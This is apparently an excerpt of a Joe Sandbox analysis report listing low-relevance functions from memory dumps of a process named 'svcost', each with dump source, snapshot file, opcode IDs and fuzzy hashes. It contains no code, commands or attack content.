                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8b5faa8295e436b6d760917d3ed639f76674c5c1bf2c81c486008727f45971ce
                                                                                                • Instruction ID: 74da25f25706c18c13b9ca45b1c93ed8b73af2d8ea6c93126f1dafbe558d1305
                                                                                                • Opcode Fuzzy Hash: 8b5faa8295e436b6d760917d3ed639f76674c5c1bf2c81c486008727f45971ce
                                                                                                • Instruction Fuzzy Hash: 2EF0A034409348EFC701DFA4D9599A8BFB8FF0A310F0090E6E8849B322C3316955EF51
                                                                                                Function 00C49058 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e3a3a4e06b5b0ad6117a7caf84e9676b3676b6e8a36f1b238eaaf065a7ae0d6b
                                                                                                • Instruction ID: f4240d54c9d38025e21c263aca1b3fe91278bb117930d19f2cc8165715a46366
                                                                                                • Opcode Fuzzy Hash: e3a3a4e06b5b0ad6117a7caf84e9676b3676b6e8a36f1b238eaaf065a7ae0d6b
                                                                                                • Instruction Fuzzy Hash: 11F0F274D04248AFCB90DFA9D954AAEBBF8EB49310F14C0AAA869D3241D6369A11DF50
                                                                                                Function 00C4B928 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a6629b4fa5c1ac91a5690fe4a044fcbe54867d78203a438d1ff6db622796a8f
                                                                                                • Instruction ID: 2c4383da9dd228b8dd2fb4e8701a854042359f4c715cbf6adee8e52aa4239619
                                                                                                • Opcode Fuzzy Hash: 2a6629b4fa5c1ac91a5690fe4a044fcbe54867d78203a438d1ff6db622796a8f
                                                                                                • Instruction Fuzzy Hash: 0EF08C35905244EFCB01CFA4DA10AADBFB4EF4A310F1480EAD9149B362C3318A05EF21
                                                                                                Function 00C27490 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a21e25361b80048b4cd29a7459fb8a96ddd1689162dbbbf82dfea36fdf2fe1a1
                                                                                                • Instruction ID: 61d69c58b15310f15a1c6df1689e07e6aafc925adcad91ab3d2b0f320452eead
                                                                                                • Opcode Fuzzy Hash: a21e25361b80048b4cd29a7459fb8a96ddd1689162dbbbf82dfea36fdf2fe1a1
                                                                                                • Instruction Fuzzy Hash: 13F02B3490D3C49FC701EB64E85096CBF759F47300F1881DAC8448B3A2C6354D06CB65
                                                                                                Function 00C23498 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b165f5d6967cd0c06222907504b06bb09f8fedcb15d97011446ba1f3c91b712
                                                                                                • Instruction ID: 120247f73559a7a1a3b5888a3c07344d4e6a3fbcc26a676d5bb607f88c644f3a
                                                                                                • Opcode Fuzzy Hash: 7b165f5d6967cd0c06222907504b06bb09f8fedcb15d97011446ba1f3c91b712
                                                                                                • Instruction Fuzzy Hash: 75F0653050F3C4AFC706DBA4E92555CBF78AF47310F1484EAD8485B292D6355A46CB42
                                                                                                Function 00C28661 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 59fbca29cd8ac15eb884de92b3f77ed0ca9b6c4b52cf8759711570e01caf2d1f
                                                                                                • Instruction ID: 44cfce47215c62610523e5ce7ca5687b3147fccca50fe5691a6bd77523bbec78
                                                                                                • Opcode Fuzzy Hash: 59fbca29cd8ac15eb884de92b3f77ed0ca9b6c4b52cf8759711570e01caf2d1f
                                                                                                • Instruction Fuzzy Hash: 14F0893480D388AFC701DFA4D5509ACFFB4AF46300F1481EBD89457252C6365A56DF52
                                                                                                Function 00C28778 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8db85222c240c444f5a5f162036ff387a3288922a9aa5770f09b026dff05439d
                                                                                                • Instruction ID: 9815e8ae9a0cc7ac3dd8395aa00cc43ab544dce17623a78f9049981ce655defb
                                                                                                • Opcode Fuzzy Hash: 8db85222c240c444f5a5f162036ff387a3288922a9aa5770f09b026dff05439d
                                                                                                • Instruction Fuzzy Hash: 14F0E5309062889FC740DBB8D854B98BFB4DB46304F6480E9C848C7352DA319E47CB01
                                                                                                Function 00C23BD8 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8b1b16d26be881a1f08684c1a3ef765d17de162e777f6288a540aa7dd37a7f0d
                                                                                                • Instruction ID: 24db54051a878782aa086988924e54ea3634cddc504d0b31bfe095567c9f8fca
                                                                                                • Opcode Fuzzy Hash: 8b1b16d26be881a1f08684c1a3ef765d17de162e777f6288a540aa7dd37a7f0d
                                                                                                • Instruction Fuzzy Hash: 28E06D3450E3889FC705DFA4E922969BF74AB4A300F1481EAC8449B3A2CA355A46CB42
                                                                                                Function 00C2D3B0 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca2dc09c4774d303040fdab2a33b10f286e810bbffee13e5edb717202fc5bbe3
                                                                                                • Instruction ID: 5429d22f010521ddd5acdea42be25084391d9579045d3ac06113a6affbff16c1
                                                                                                • Opcode Fuzzy Hash: ca2dc09c4774d303040fdab2a33b10f286e810bbffee13e5edb717202fc5bbe3
                                                                                                • Instruction Fuzzy Hash: D5E06D789152089FDB40DFA8EA9575CBBB4DB08314F2044AAC809E3391E6319A42CB52
                                                                                                Function 00C28430 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 82c21d04815bbec47e1788df8f88648ef59ec945b84d443c825074baa6f0adb6
                                                                                                • Instruction ID: 9c5a98e29ad87bf5a497468e54040f8fb3f68992784455d12b79ad2c7ccd5fed
                                                                                                • Opcode Fuzzy Hash: 82c21d04815bbec47e1788df8f88648ef59ec945b84d443c825074baa6f0adb6
                                                                                                • Instruction Fuzzy Hash: 08F0653050A2C49FCB12D7B895609ACBF70DB07204F5985DEC894976A3C6365D0ECB51
                                                                                                Function 00C27D21 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 133d8bfd27bedc3179d30a07da5f46f7e511c820897848538ad8d5f1f86a2b41
                                                                                                • Instruction ID: 6a71d3132adaad97c9f24ae10a169ccb09766e83865bc781ac3cda204e02f1bf
                                                                                                • Opcode Fuzzy Hash: 133d8bfd27bedc3179d30a07da5f46f7e511c820897848538ad8d5f1f86a2b41
                                                                                                • Instruction Fuzzy Hash: DDE0923450D388DFC702DBB4E961AB9BF749F47300F5492EAC8449B352D6325D46CB62
                                                                                                Function 043273D0 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b60ffbfdac1fc1bfe07138e272220735730004d12aa797e96782acbc0f3e74d4
                                                                                                • Instruction ID: e2b12d60480c5931a418733020dcf021cd2f6900d433891899a8f848b9d368f6
                                                                                                • Opcode Fuzzy Hash: b60ffbfdac1fc1bfe07138e272220735730004d12aa797e96782acbc0f3e74d4
                                                                                                • Instruction Fuzzy Hash: E8F03030909244DFC741DFA8D96469DBFF4FF0A204F1455EAC808D7252D7325A56DF41
                                                                                                Function 00C4DEE0 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40d5f1e4a087a7b8da17e45cc5f259694375eee733790f5fd663f4414a2680f8
                                                                                                • Instruction ID: 9e852e375e853ef3ea63ebf4a8bd46b1360853be00941aeeaeb25ebbf5699f36
                                                                                                • Opcode Fuzzy Hash: 40d5f1e4a087a7b8da17e45cc5f259694375eee733790f5fd663f4414a2680f8
                                                                                                • Instruction Fuzzy Hash: 89E0D83230430947C7109B9BEC84C5BFB9AEFD0231310CA3AD00E87120CEB0AC0687D0
                                                                                                Function 00C45770 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 86710ae5e6cf1e57542d9682a08e7317316a9a065c8a420822cd30744446a3a3
                                                                                                • Instruction ID: af071dbc6b3a6afebb6888e427cde628f5dc88e0b868c93e2736e38e1c394a22
                                                                                                • Opcode Fuzzy Hash: 86710ae5e6cf1e57542d9682a08e7317316a9a065c8a420822cd30744446a3a3
                                                                                                • Instruction Fuzzy Hash: 20F0E57480E388EFCB12CBA0D9A099DBF70EF46340F2491EEDC8553392C2364A45CB11
                                                                                                Function 00C20858 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd3413764992bed8e75cf0da91db3e6fa4ee279dfbaf4fd138f26b162b36cb3d
                                                                                                • Instruction ID: b5190343b9c37d8c436ff825b5083b3cde3e7d8229b1896837e14b9e533d1b03
                                                                                                • Opcode Fuzzy Hash: cd3413764992bed8e75cf0da91db3e6fa4ee279dfbaf4fd138f26b162b36cb3d
                                                                                                • Instruction Fuzzy Hash: 35E09B3444D3889FC705DBA4E965569BF79AF47304F1481DAC8846B393C6315E07C781
                                                                                                Function 00C22958 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fc0953d5f34ae12ebf516a1576bb14b55aa2a535cc6c9d0e147be8194a824274
                                                                                                • Instruction ID: 73c527efd5e6ab6b47246bbf340ae9592dc0621e592819b80a1ec660fd8e9bee
                                                                                                • Opcode Fuzzy Hash: fc0953d5f34ae12ebf516a1576bb14b55aa2a535cc6c9d0e147be8194a824274
                                                                                                • Instruction Fuzzy Hash: B3E0653090A294DFC706DBA4E960958BF71EB57305F1881DEC44457752C6328E46CB52
                                                                                                Function 00C286F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 68b1cbc4c4af041a38ddb0466ea45aaf790bd8cfe9d71971e2f88b6bb72ff95b
                                                                                                • Instruction ID: bf3c5cbf0e5a2449cdd0f64d8f2fcb8d342466c8454995464cc25b1639d72664
                                                                                                • Opcode Fuzzy Hash: 68b1cbc4c4af041a38ddb0466ea45aaf790bd8cfe9d71971e2f88b6bb72ff95b
                                                                                                • Instruction Fuzzy Hash: FAE0D83440E384AFD702C754A920A94BF788B07224F2840DAD44487653CA365D07CB51
                                                                                                Function 00C29F99 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e231c9ad530479b4fcaa17b33d3f56333ef7e41d22d7841fc00d5b19856a220
                                                                                                • Instruction ID: 2a196bda9d1fbf6cca6c858ac1cd331943ecb57fa123fe888dc382c6f379198d
                                                                                                • Opcode Fuzzy Hash: 5e231c9ad530479b4fcaa17b33d3f56333ef7e41d22d7841fc00d5b19856a220
                                                                                                • Instruction Fuzzy Hash: 3FF03030D093849FC705DBA4D5546ACBFB4EF46311F14C4EAC854D7252D6354A46CB41
                                                                                                Function 00C21F01 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ada6fdcd294903e81ac9146617516fcdaca4b0cd63fb30c9f85685245efe5e9d
                                                                                                • Instruction ID: 30b47ed5e4df91836ce3510ea54d2ef391c39290489949182e5a1df5e61f272c
                                                                                                • Opcode Fuzzy Hash: ada6fdcd294903e81ac9146617516fcdaca4b0cd63fb30c9f85685245efe5e9d
                                                                                                • Instruction Fuzzy Hash: 54E06D3084E3849FC705CBA0EA6596DBF74AB47300F1880EAC8545B7A2C6324E46CB42
                                                                                                Function 04325CAF Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05160e742a3fe5f5f8f3ec4cea1c12c5895977cf3d48787ce2cd818a733191bd
                                                                                                • Instruction ID: d55c4ab77e837f2ba56125113e1536469d7a62bb1d803c0f71154a826fcfef14
                                                                                                • Opcode Fuzzy Hash: 05160e742a3fe5f5f8f3ec4cea1c12c5895977cf3d48787ce2cd818a733191bd
                                                                                                • Instruction Fuzzy Hash: 38F0F270D06208AFCB04DFA8D194BEDBBF4FF04349F1081A9C419A2240EB35A659CF40
                                                                                                Function 04325D28 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0a1e03ccc098e250a4145c3e99d54790cc7e12a8f364780b3e8f75c740b842d
                                                                                                • Instruction ID: 832e263560a9041ba06fb4616bcfcdc8396a6e548b6b4fbd4d7f8fbb42e8d425
                                                                                                • Opcode Fuzzy Hash: a0a1e03ccc098e250a4145c3e99d54790cc7e12a8f364780b3e8f75c740b842d
                                                                                                • Instruction Fuzzy Hash: BDE06D74945748EFC700DFB8D928799BFB8EB0A300F1011E9C48893261E7316694CB42
                                                                                                Function 043277B1 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0bd90499b5fa9c02cd1d4770c23bcc4a1954205c37ad1c78108924068e534a5a
                                                                                                • Instruction ID: d37cfcbfdd943c0a908f08a56543eb1a0dadd5f378774ddb4a487beacb1e7157
                                                                                                • Opcode Fuzzy Hash: 0bd90499b5fa9c02cd1d4770c23bcc4a1954205c37ad1c78108924068e534a5a
                                                                                                • Instruction Fuzzy Hash: 07F01C74E05248AFCB50DFA8D554BADFBB4FB49304F1484EE989893341D7316A42CF41
                                                                                                Function 043292E8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 12e2b54279787e260ee97f28e0088076fecb26ada4dd1c9f3d245fcf4bd17947
                                                                                                • Instruction ID: a8f5f0c2a55168227d05f29db18076efbe2f67cae18b9e01070a675dc65f3639
                                                                                                • Opcode Fuzzy Hash: 12e2b54279787e260ee97f28e0088076fecb26ada4dd1c9f3d245fcf4bd17947
                                                                                                • Instruction Fuzzy Hash: 6AE0923190D388AFC742DBF498116ACBFB1DF46200B1486EFD449D7282D9311E09CB52
                                                                                                Function 00C20F30 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 724fcf4fa12a4a928eee8d9dca89e43806eccde922694eb4e275d9b988c79e7e
                                                                                                • Instruction ID: 72df878701a48874a9114f108ab4d85095254e737bab353cea11f84ba88ab140
                                                                                                • Opcode Fuzzy Hash: 724fcf4fa12a4a928eee8d9dca89e43806eccde922694eb4e275d9b988c79e7e
                                                                                                • Instruction Fuzzy Hash: 82E0927490E3448FCB05CFA0F92459CBF70EB47304F2481EBD8585B352C6324A06CB11
                                                                                                Function 0432BF78 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4925952efbe872929086d0b98c05d70dcf63858a86418cd0846146ab63c7f78f
                                                                                                • Instruction ID: 6d9965aa4b42c4783e544e1e630b4796d0b7c1405a147465e8fd0138cda5a0e4
                                                                                                • Opcode Fuzzy Hash: 4925952efbe872929086d0b98c05d70dcf63858a86418cd0846146ab63c7f78f
                                                                                                • Instruction Fuzzy Hash: 9BE01231B28A27FF5B684E79AA40B36B3DE7B886503446475A406C7541FB30F850DE95
                                                                                                Function 04326028 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 99f425c2596124bde799761b129b6a3b6ace2a42d66d01daf9045326f71f1b12
                                                                                                • Instruction ID: 1658f89a9b1cd1b43371381fa7930c4e455e45aa213fbb64a30db3bc97feaf04
                                                                                                • Opcode Fuzzy Hash: 99f425c2596124bde799761b129b6a3b6ace2a42d66d01daf9045326f71f1b12
                                                                                                • Instruction Fuzzy Hash: 4AE0923040A388DFC702DBB89925ABD7F7CAF0B300F0090EAC44493212C6301945E756
                                                                                                Function 04327120 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1557af0f3831a7527ce5ae6cf1a387d8097c1cedcd2d370ba6b87af42e1b5c31
                                                                                                • Instruction ID: 560a3e449a5970c3becfdc4262e4686acccc960a1baae676ba4b87afe7bad91f
                                                                                                • Opcode Fuzzy Hash: 1557af0f3831a7527ce5ae6cf1a387d8097c1cedcd2d370ba6b87af42e1b5c31
                                                                                                • Instruction Fuzzy Hash: F7F03030A191849FC741DB78D95579CFFB4FF0A205F1455E9C808A3242D7326A51CB41
                                                                                                Function 04329330 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dab4f627f0ae4b3a35f45c3ad2f2d8a6369ad7da4a3d71550e4d3e8077241108
                                                                                                • Instruction ID: c2e2043b19863f17bc4383299ea5abe136a0f9033a286787713b13da333629de
                                                                                                • Opcode Fuzzy Hash: dab4f627f0ae4b3a35f45c3ad2f2d8a6369ad7da4a3d71550e4d3e8077241108
                                                                                                • Instruction Fuzzy Hash: EBE06D7090E388AFCB02DBB59C616ADBFB1DF82200B5586EED445DB292DA301E09DB51
                                                                                                Function 00C455C9 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 27a5f68b72071e549fe2dc66de0a4abe992cd649eb8ca7af536c778176161c75
                                                                                                • Instruction ID: 7c40f64850f1c470421bd7841479b226fa3185885946533f473b7580637b64e4
                                                                                                • Opcode Fuzzy Hash: 27a5f68b72071e549fe2dc66de0a4abe992cd649eb8ca7af536c778176161c75
                                                                                                • Instruction Fuzzy Hash: 60E06D7090A2848FCB05CBA49A6496CBF31AB47304F1481DEC40557293C6364A06CB56
                                                                                                Function 00C4F551 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c741f9e61e3b5a8cb46be855f46acc07377ca1beba2b2a27270906494bae6fea
                                                                                                • Instruction ID: 38c5357937ae8c293e5aed3a57924d21b3ce2182c5a3e17e711d796ced08bbd4
                                                                                                • Opcode Fuzzy Hash: c741f9e61e3b5a8cb46be855f46acc07377ca1beba2b2a27270906494bae6fea
                                                                                                • Instruction Fuzzy Hash: C1E0822070CB814FC762833AAC2604A7FE28B86A01305C6AAC0C6CB2A6DD20CD078722
                                                                                                Function 00C4CEA8 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70db889f35ad44fa37aa8cdc1041670fc71b462fe947f7ed160c448a22d74679
